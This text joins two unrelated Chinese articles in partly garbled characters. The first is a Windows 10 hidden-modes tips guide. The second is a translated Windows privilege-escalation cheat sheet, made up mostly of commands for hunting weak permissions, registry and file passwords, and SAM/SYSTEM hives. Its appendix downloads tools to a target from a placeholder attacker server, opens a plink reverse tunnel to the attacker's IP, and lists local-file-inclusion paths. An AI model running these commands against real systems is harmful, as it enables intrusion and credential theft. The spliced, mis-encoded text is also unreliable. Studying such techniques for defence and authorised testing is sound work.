出于某種原因,Windows 10的一些最有用的功能被神秘地隱藏起來了,下面,我們將揭示如何找到操作系統(tǒng)的隱藏“模式”,在哪里可以找到它們、它們的作用以及如何充分利用它們。
一、改進(jìn)Windows的工作方式
1.上帝模式
它的作用:在Windows 7中,微軟引入了一個(gè)有用的隱藏工具,稱為上帝模式,它在一個(gè)屏幕上顯示所有操作系統(tǒng)的自定義選項(xiàng)和管理工具。盡管在Windows 10中,微軟已將大量配置功能移至“設(shè)置”應(yīng)用程序,但并未從操作系統(tǒng)中刪除“控制面板”。這意味著上帝模式仍然有效,可以幫助用戶在一個(gè)地方更改大量(有數(shù)百個(gè))的設(shè)置。
在哪里找到它:要啟用該功能,請右鍵單擊桌面并選擇新建→文件夾,將新建的文件夾命名為以下名稱,注意不要輸入漢字,只輸入下面的代碼:
下面只列出了部分常用的功能代碼
上帝模式
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
默認(rèn)程序
Default Programs.{17cd9488-1228-4b2f-88ce-4298e93e0966}
我的電腦
My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
網(wǎng)絡(luò)
Network.{208D2C60-3AEA-1069-A2D7-08002B30309D}
程序和功能
Programs and Features.{15eae92e-f17a-4431-9f28-805e482dafd4}
電源設(shè)置
Power Settings.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}
圖標(biāo)和通知
Icons And Notifications.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}
防火墻和安全
Firewall and Security.{4026492F-2F69-46B8-B9BF-5654FC07E423}
如何使用它:一旦你創(chuàng)建了上帝模式文件夾(或上面列出的任何一種),只需雙擊它即可訪問其中包含的系統(tǒng)設(shè)置。
2.游戲模式
它的作用:首先在Windows 10創(chuàng)意者更新中引入,游戲模式旨在智能地管理系統(tǒng)資源以優(yōu)先考慮游戲,這意味著其他應(yīng)用程序?qū)o法發(fā)揮作用并減慢速度,并且Windows不會嘗試在游戲中途的關(guān)鍵點(diǎn)安裝更新。
在哪里找到它:在搜索框中輸入游戲,然后按Enter鍵,打開游戲模式設(shè)置頁面。默認(rèn)情況下該功能應(yīng)該已啟用,但如果未啟用,請將切換開關(guān)撥至“開”。如果你不玩游戲,你可以禁用該模式。
如何使用它:當(dāng)你開始玩支持的游戲時(shí),游戲模式應(yīng)該會自動啟動。你可以隨時(shí)按Win+G打開游戲欄,它提供了許多可以啟用的功能,包括告訴Windows記住當(dāng)前運(yùn)行的應(yīng)用程序?qū)嶋H上是一個(gè)游戲。
3.省電模式
它的作用:Windows 10的“省電模式”延長了筆記本電腦或平板電腦在兩次充電之間的續(xù)航時(shí)間。當(dāng)電池電量不足時(shí),你會在手機(jī)上看到類似的啟動。它會調(diào)整某些功能以減少設(shè)備使用的電量,例如降低顯示亮度和限制你不積極使用的應(yīng)用程序使用的資源。
在哪里找到它:單擊任務(wù)欄上的電池圖標(biāo),在打開的窗口中,使用滑塊在電池壽命和性能之間取得平衡。也可以打開電池設(shè)置頁面,設(shè)置“省電模式”的觸發(fā)器(當(dāng)電池壽命低于X%時(shí))。可以通過打開通知中心并單擊那里的按鈕來打開或關(guān)閉該功能。
如何使用它:省電模式的設(shè)置頁面上有一個(gè)切換開關(guān),可讓你將其保持在此模式下,直到下一次充電。
4.增強(qiáng)的搜索模式
它的作用:默認(rèn)情況下,Windows 10會為你的桌面和庫編制索引,以便更輕松地查找內(nèi)容。但是,你可以擴(kuò)展它以便搜索你的整個(gè)PC,或?qū)ζ溥M(jìn)行自定義,以便搜索排除特定位置。
在哪里找到它:選擇開始,轉(zhuǎn)到設(shè)置,然后打開搜索。選擇左側(cè)的“搜索窗口”,然后選擇右側(cè)的“增強(qiáng)”選項(xiàng)。
如何使用它:如果這是你第一次使用增強(qiáng)型搜索功能,Windows將首先必須為文件編制索引。可以通過查看上面的索引狀態(tài)來跟蹤其進(jìn)度。根據(jù)硬盤空間的大小,可能需要一些時(shí)間才能完成。選擇排除文件夾選項(xiàng)以選擇你希望索引過程忽略的任何文件夾。默認(rèn)情況下,這些將包括系統(tǒng)文件夾。
5.休眠模式
它的作用:最好在不使用PC時(shí)將其關(guān)閉,但也可以選擇將其置于休眠或睡眠狀態(tài)。對于前者,Windows將內(nèi)存中的所有內(nèi)容復(fù)制到硬盤上名為Hiberfil.sys的文件,然后完全關(guān)閉。當(dāng)你啟動電腦時(shí),Windows會將此文件加載到內(nèi)存中,從而避免通常的啟動檢查并允許從上次中斷的地方繼續(xù)。
在哪里找到它:休眠主要是為筆記本電腦上而設(shè)計(jì)的,因此通常在臺式電腦上默認(rèn)關(guān)閉。要在運(yùn)行Windows 10的電腦上啟用它,只需在Windows搜索框中鍵入cmd,然后按Ctrl+Shift+Enter即可打開具有管理權(quán)限的命令提示符窗口,然后,鍵入powercfg/hibernate on并按Enter鍵,并鍵入exit命令關(guān)閉CMD窗口。
如果在關(guān)機(jī)菜單中沒有顯示休眠選項(xiàng),請?jiān)赪indows搜索框中鍵入電源選項(xiàng),按Enter鍵并單擊右側(cè)的“其他電源設(shè)置”鏈接。選擇左側(cè)的“計(jì)算機(jī)睡眠時(shí)更改”鏈接,然后選擇“更改高級電源設(shè)置”,單擊睡眠旁邊的加號并關(guān)閉“允許混合睡眠”選項(xiàng)。可以通過“休眠后”設(shè)置選擇Windows何時(shí)休眠。
如何使用它:休眠模式使用起來非常簡單。啟用后,單擊開始按鈕,然后單擊電源按鈕并選擇休眠。如果你剛剛設(shè)置了該功能并且它不可見,請嘗試重新啟動PC。
6.飛行模式
它的作用:你可能對手機(jī)上的飛行模式很熟悉,它基本上會關(guān)閉手機(jī)上的所有無線通信方式,包括Wi-Fi、蜂窩、藍(lán)牙、GPS和近場通信(NFC)。之所以如此命名,是因?yàn)槟憧梢栽陲w機(jī)起飛和降落期時(shí)切換到該模式,以節(jié)省你在物理上關(guān)閉并再次打開手機(jī)的麻煩。
飛行模式在其他時(shí)候也很有用,例如當(dāng)你想避免意外使用移動數(shù)據(jù)時(shí)。Windows 10具有完全相同的功能。
在哪里找到它:單擊Windows 10任務(wù)欄上的網(wǎng)絡(luò)圖標(biāo),將看到一個(gè)“飛行模式”圖塊,你以單擊它來激活該功能。這在舊版本的操作系統(tǒng)上稱為“飛行模式”。
如何使用它:如果你攜帶筆記本電腦旅行并且不希望它嘗試連接到你所到之處的網(wǎng)絡(luò),飛行模式可能非常有用并且易于啟用和禁用。該功能還有一個(gè)設(shè)置頁面,你可以在其中打開或關(guān)閉它,并選擇是否啟用或禁用Wi-Fi和/或藍(lán)牙。
7.訪客模式
它的作用:如果有人經(jīng)常要求使用你的計(jì)算機(jī),你可以創(chuàng)建一個(gè)訪客帳戶,讓他們遠(yuǎn)離你的私人數(shù)據(jù)。
在哪里找到它:Windows曾經(jīng)有一個(gè)訪客帳戶選項(xiàng),但在Windows 10中不再可用。你需要使用命令提示符創(chuàng)建一個(gè)帳戶。按Win+X并選擇“命令提示符(管理員)”或“PowerShell管理員”,如果你看到的是這樣的話。你不能將帳戶稱為訪客,因此我們將其稱為訪客。鍵入net user Visitor*并按Enter。你不需要密碼,因此只需再次按Enter。接下來,輸入net localgroup users Visitor/delete并按Enter,然后輸入net localgroup guest Visitor/add并再次按Enter。關(guān)閉窗口。
如何使用它:一旦設(shè)置了訪客帳戶,只需重新啟動Windows或注銷即可在你重新登錄時(shí)查看訪客選項(xiàng)。為你的訪客選擇此選項(xiàng),他們將能夠使用你的PC和程序,但不能查看或訪問你的數(shù)據(jù)。
二、修復(fù)Windows的問題
1.安全模式
它的作用:如果Windows無法加載或無法正常運(yùn)行,可能是惡意啟動程序或驅(qū)動程序的罪魁禍?zhǔn)住T谀銏?zhí)行任何其他操作之前,請嘗試在安全模式下運(yùn)行Windows,這是操作系統(tǒng)的輕量級版本,其中僅加載了Windows運(yùn)行所必需的最少驅(qū)動程序和服務(wù)。它還使用通用的顯卡驅(qū)動程序,以防萬一遇到麻煩。
在哪里找到它:有幾種方法可以訪問Windows 10中的安全模式。如果可以進(jìn)入操作系統(tǒng),請?jiān)赪indows搜索框中鍵入msconfig,然后按Enter鍵。選擇“引導(dǎo)”選項(xiàng)卡,然后在“引導(dǎo)選項(xiàng)”下勾選“安全引導(dǎo)”并確定,重新啟動電腦。
另一個(gè)方法是單擊開始按鈕,按住Shift,單擊電源按鈕并選擇重新啟動。也可以按住Shift并從Windows登錄屏幕中選擇電源、重新啟動。當(dāng)Windows恢復(fù)菜單加載時(shí),單擊“疑難解答”、“高級選項(xiàng)”并選擇“啟動設(shè)置”,然后單擊重新啟動,選擇需要的引導(dǎo)選項(xiàng)。
如果你根本無法進(jìn)入Windows,請關(guān)閉你的PC,重新啟動它,并在它嘗試加載操作系統(tǒng)時(shí)再次重新啟動PC。執(zhí)行此操作3次,Windows恢復(fù)菜單將加載。
如何使用它:有兩個(gè)版本的安全模式——帶網(wǎng)絡(luò)和不帶網(wǎng)絡(luò)。“帶網(wǎng)絡(luò)的安全模式”添加了網(wǎng)絡(luò)驅(qū)動程序和服務(wù),因此可以訪問網(wǎng)絡(luò)上的其他計(jì)算機(jī),最有用的是可以訪問互聯(lián)網(wǎng)。如果安全模式加載成功,你可以使用系統(tǒng)還原將計(jì)算機(jī)回滾到正常狀態(tài),然后卸載任何有問題的軟件或?qū)ふ移渌鉀Q方案。
2.兼容模式
它的作用:如果某個(gè)程序無法在Windows 10中運(yùn)行,可能是因?yàn)樗呀?jīng)有幾年沒有更新了,你可以嘗試使用兼容模式來欺騙軟件,使其認(rèn)為它運(yùn)行在較舊的操作系統(tǒng)上,例如Windows 7的。
在哪里找到它:右鍵單擊有問題軟件的“.exe”文件并選擇“疑難解答兼容性”。
有兩個(gè)選擇:嘗試推薦的設(shè)置或?qū)Τ绦蜻M(jìn)行故障排除,這將讓你指定要模仿的Windows版本。
如何使用它:選擇對程序進(jìn)行故障排除的選項(xiàng),然后勾選“該程序在早期版本的Windows中運(yùn)行,但現(xiàn)在無法安裝或運(yùn)行”,點(diǎn)擊下一步,可以選擇嘗試使用哪個(gè)舊版本的Windows。如果你不確定,請勾選“我不知道”。單擊“測試程序”按鈕以?查看兼容模式是否有效。
3.專注助手模式
它的作用:當(dāng)你玩游戲或運(yùn)行其他類型的全屏應(yīng)用程序時(shí),可能不想被分散注意力的通知所困擾。“專注助手”會自動向你隱藏這些通知,直到你完成當(dāng)前正在執(zhí)行的操作。它還可以在一天中的特定時(shí)間隱藏通知。
在哪里找到它:在Windows搜索框中鍵入“專注助手”,然后按Enter打開該功能的“設(shè)置”窗口。在這里,你可以打開它,選擇你看到的通知或?qū)⑺鼈內(nèi)侩[藏,警報(bào)除外。
如何使用它:設(shè)置窗口允許你配置自動規(guī)則。選擇你希望“專注助手”運(yùn)行和靜音通知的時(shí)間和活動。該功能將提供你從專注助手模式中出現(xiàn)時(shí)錯(cuò)過的內(nèi)容的摘要,但如果不需要,可以禁用此選項(xiàng)。
4.S模式
它的作用:Windows 10的S模式會鎖定操作系統(tǒng),表面上是為了保護(hù)計(jì)算機(jī)免受可能的威脅。它適合沒有經(jīng)驗(yàn)的PC用戶或需要更快、更鎖定系統(tǒng)的用戶,例如在商業(yè)或?qū)W校環(huán)境中。你只能從Microsoft Store安裝應(yīng)用程序,使用Edge瀏覽網(wǎng)頁并使用Bing進(jìn)行搜索。
在哪里找到它:S模式安裝在某些新的PC和平板電腦上,例如Microsoft的Surface Go 2(你不能單獨(dú)購買操作系統(tǒng))。如果你不確定是否使用這個(gè)模式,請轉(zhuǎn)到“設(shè)置”、“系統(tǒng)”、“關(guān)于”并向下滾動到“Windows規(guī)格”部分,如果它提到“S模式”,表明這就是你正在運(yùn)行的。
如何使用它:鑒于S模式的限制,你可能更愿意使用成熟的Windows 10操作系統(tǒng),然而,這是一個(gè)單向過程,一旦它被禁用,你就無法重新啟用它。要進(jìn)行切換,請轉(zhuǎn)到設(shè)置,選擇更新和安全,然后單擊左側(cè)的激活。在右側(cè),單擊“轉(zhuǎn)到商店以切換到Windows 10專業(yè)版”下的鏈接。
三、讓W(xué)indows更易于使用
1.深色模式
它的作用:一直以來用戶可以自定義Windows的外觀,但Windows 10帶有一個(gè)方便但隱藏的內(nèi)置深色模式,不僅看起來不錯(cuò),而且可以節(jié)省電池壽命并減少眼睛疲勞。
在哪里找到它:要打開深色模式,請打開“開始”菜單并選擇“設(shè)置”,單擊“個(gè)性化”并選擇左側(cè)的“顏色”,單擊“選擇顏色”下的“深色”選項(xiàng)。
使用方法:啟用深色模式后,它會自動更改Windows 10的主題(要更改回來,請選擇淺色)。
2.平板模式
它的作用:如果你在平板電腦或帶觸摸屏的筆記本電腦上使用Windows 10,那么使用手指與操作系統(tǒng)進(jìn)行交互可能會很繁瑣。平板電腦模式釋放了屏幕空間并使其更易于導(dǎo)航,將開始菜單替換為Windows 8中引入的開始屏幕。
在哪里找到它:在Windows搜索框中鍵入平板電腦模式,然后按Enter鍵,平板電腦模式設(shè)置屏幕將打開。當(dāng)你打開PC時(shí),你可以讓W(xué)indows始終以平板電腦模式打開,但這并不總是可行的,因此請單擊“當(dāng)我將此設(shè)備用作平板電腦時(shí)”下拉菜單并選擇“切換模式前詢問我”選項(xiàng)。要激活平板模式,請打開任務(wù)欄上的通知中心,然后單擊“平板模式”按鈕。
如何使用它:在平板電腦模式下,你可以通過按磁貼與“開始”屏幕進(jìn)行交互。左上角還有一個(gè)三行菜單按鈕,用于訪問所有應(yīng)用程序和其他設(shè)置。此外,還可以使用手勢來控制屏幕上的動作:從右側(cè)滑入打開動作中心,而從左側(cè)滑入顯示所有打開的應(yīng)用在視圖中,更容易在它們之間切換。
3.高對比度模式
它的作用:如果閱讀文本很困難,尤其是在具有低對比度配色方案的網(wǎng)站上,Windows 10的“高對比度”模式提供了更多不同的顏色組合,甚至可以讓你創(chuàng)建自己的自己的主題。
在哪里找到它:在Windows搜索框中輸入高對比度,然后按Enter鍵。在打開的高對比度設(shè)置頁中將開關(guān)撥到開并等待Windows進(jìn)行更改(需要一段時(shí)間)。要在“高對比度”視圖和普通視圖之間切換,請使用鍵盤快捷鍵左Alt+左Shift+Print Screen。
如何使用它:在“選擇主題”下拉菜單中可以從經(jīng)典、高對比度黑色、高對比度白色和高對比度#1和#2中選擇一個(gè)主題。還可以通過選擇用于文本、鏈接、按鈕和背景的顏色來創(chuàng)建自己的主題。#win10玩機(jī)技巧#�
介紹
特權(quán)升級總是被歸結(jié)為適當(dāng)?shù)拿杜e。但要完成適當(dāng)?shù)拿杜e,你需要知道要檢查和查找的內(nèi)容。這通常需要伴隨著經(jīng)驗(yàn)的豐富而對系統(tǒng)非常熟悉。起初特權(quán)升級看起來像是一項(xiàng)艱巨的任務(wù),但過了一段時(shí)間,你就開始過濾哪些是正常的東西,而哪些不是正常的東西。最終變得更容易,因?yàn)槟阒酪獙ふ沂裁戳耍皇峭诰蛳M诟刹荻阎姓业侥歉樀乃袞|西。希望本指南能為你的入門提供良好的基礎(chǔ)知識。
本指南受到了g0tm1lk發(fā)表的基本的Linux提權(quán)姿勢的文章的影響,在某些時(shí)候,你應(yīng)該已經(jīng)看到并使用了該指南。我想試圖反映他的指導(dǎo),除了Windows。所以本指南主要集中在枚舉方面。
注:我不是專家,仍然在學(xué)習(xí)當(dāng)中。
指南概述
在每個(gè)部分中,我首先提供老的可靠的CMD命令,然后是一個(gè)Powershell實(shí)現(xiàn)的的等價(jià)命令。同時(shí)擁有這兩種工具是非常好的,Powershell比傳統(tǒng)的CMD更加靈活。然而,沒有一個(gè)Powershell命令能等價(jià)于所有東西(或者CMD在某些事情上仍然更簡單更好),所以一些部分將只包含常規(guī)的CMD命令。
操作系統(tǒng)
操作系統(tǒng)類型和架構(gòu)?它是否缺少任何補(bǔ)丁?
systeminfo
wmic qfe
環(huán)境變量有什么有趣的地方嗎?域控制器在LOGONSERVER?
set
Get-ChildItem Env: | ft Key,Value
有沒有其他連接的驅(qū)動器?
net use
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root用戶
你是誰?
whoami
echo %USERNAME%
$env:UserName
系統(tǒng)上有哪些用戶?任何舊的用戶配置文件沒有被清理掉?
net users
dir /b /ad "C:\Users\"
dir /b /ad "C:\Documents and Settings\" # Windows XP and below
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
是否有其他人登錄?
qwinsta
系統(tǒng)上有哪些用戶組?
net localgroup
Get-LocalGroup | ft Name
在管理員組中有哪些用戶?
net localgroup Administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
用戶自動登錄對應(yīng)的注冊表中有些什么內(nèi)容?
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
Credential Manager中有什么有趣的東西?
cmdkey /list
我們可以訪問SAM和SYSTEM文件嗎?
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
程序,進(jìn)程和服務(wù)
系統(tǒng)都安裝了些什么軟件?
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
有沒有權(quán)限設(shè)置的比較脆弱的文件夾或文件的權(quán)限?
在程序文件夾中(Program Folders)有哪些文件或文件夾賦予了所有人(Everyone)或用戶(User)的完全權(quán)限?
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
修改程序文件夾(Program Folders)中的所有人(Everyone)或用戶(User)的權(quán)限?
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}你也可以上傳Sysinternals中的accesschk來檢查可寫文件夾和文件。
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *
系統(tǒng)上正在運(yùn)行的進(jìn)程/服務(wù)有哪些?有沒有暴露的內(nèi)部服務(wù)?如果是這樣,我們可以打開它嗎?請參閱附錄中的端口轉(zhuǎn)發(fā)。
tasklist /svc
tasklist /v
net start
sc query
Get-Process | ft ProcessName,Id
Get-Service
是否存在任何脆弱的服務(wù)權(quán)限?我們可以重新配置什么嗎?你可以再次上傳accesschk來檢查權(quán)限。
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *
有沒有引用的服務(wù)路徑?
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\" 2>nul |findstr /i /v """
是否設(shè)置了計(jì)劃任務(wù)?任何自定義實(shí)現(xiàn)的計(jì)劃任務(wù)?
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
Get-ScheduledTask | ft TaskName, State
系統(tǒng)啟動時(shí)都運(yùn)行了些什么?
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
AlwaysInstallElevated是否啟用?我沒有跑過這個(gè),但沒有傷害檢查。
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
網(wǎng)絡(luò)
連接到了哪一塊網(wǎng)卡?是否有多個(gè)網(wǎng)絡(luò)?
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
我們有哪些網(wǎng)絡(luò)路線?
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP緩存中有什么?
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
是否有連接到其他主機(jī)的網(wǎng)絡(luò)連接?
netstat -ano
hosts文件中的任何東西?
C:\WINDOWS\System32\drivers\etc\hosts
防火墻是否打開?如果是又是怎樣配置的?
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"
任何其他有趣的接口配置?
netsh dump
有沒有SNMP配置?
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
有趣的文件和敏感信息
這部分內(nèi)容的命令輸出可能有點(diǎn)雜亂,所以你可能想把命令的輸出重定向到txt文件中進(jìn)行審查和解析。
在注冊表中是否有任何密碼?
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
查看是否存在沒有清理掉的sysprep或unattended文件?
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}如果服務(wù)器是IIS網(wǎng)絡(luò)服務(wù)器,那么inetpub中有什么?以及任何隱藏的目錄?web.config文件?
dir /a C:\inetpub\
dir /s web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
在IIS日志目錄中有些什么文件?
C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
是否安裝了XAMPP,Apache或PHP?任何有XAMPP,Apache或PHP配置文件?
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
Get-Childitem –Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue
系統(tǒng)中是否存在任何Apache網(wǎng)絡(luò)日志?
dir /s access.log error.log
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
系統(tǒng)中是否任何有趣的文件?可能在用戶目錄(桌面,文檔等)?
dir /s *pass* == *vnc* == *.config* 2>nul
Get-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue
系統(tǒng)中是否有包含密碼的文件?
findstr /si password *.xml *.ini *.txt *.config 2>nul
Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"
附錄
傳輸文件
在特權(quán)升級過程中的某個(gè)時(shí)候,你需要將文件放到你的目標(biāo)上。下面是一些簡單的方法來做到這一點(diǎn)。
Powershell Cmdlet(Powershell 3.0及更高版本)
Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\filename"
Powershell一行代碼實(shí)現(xiàn)方法:
(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename", "C:\Windows\Temp\filename")Powershell腳本
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://IPADDRESS/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
通過文本文件的非交互式FTP。當(dāng)你只有有限的命令執(zhí)行時(shí)這很有用。
echo open 10.10.10.11 21> ftp.txt
echo USER username>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo GET filename>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
CERTUTIL
certutil.exe -urlcache -split -f https://myserver/filename outputfilename
轉(zhuǎn)發(fā)端口
這對于暴露機(jī)器外部不可用的內(nèi)部服務(wù)非常有用,通常是由于防火墻設(shè)置。
上傳plink.exe到目標(biāo)。
在攻擊機(jī)器上啟動SSH。
例如要公開SMB,在目標(biāo)上運(yùn)行:
plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS
注意:從Windows 10的秋季創(chuàng)作者更新版本開始,OpenSSH已經(jīng)在Windows的beta版本中推出,所以我預(yù)計(jì)有一天我們可能只能使用普通的舊的SSH命令進(jìn)行端口轉(zhuǎn)發(fā),具體取決于是否啟用。
本地文件包含列表
這不是一個(gè)詳盡的列表,安裝目錄會有所不同,我只列出了一些常見的文件路徑。
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
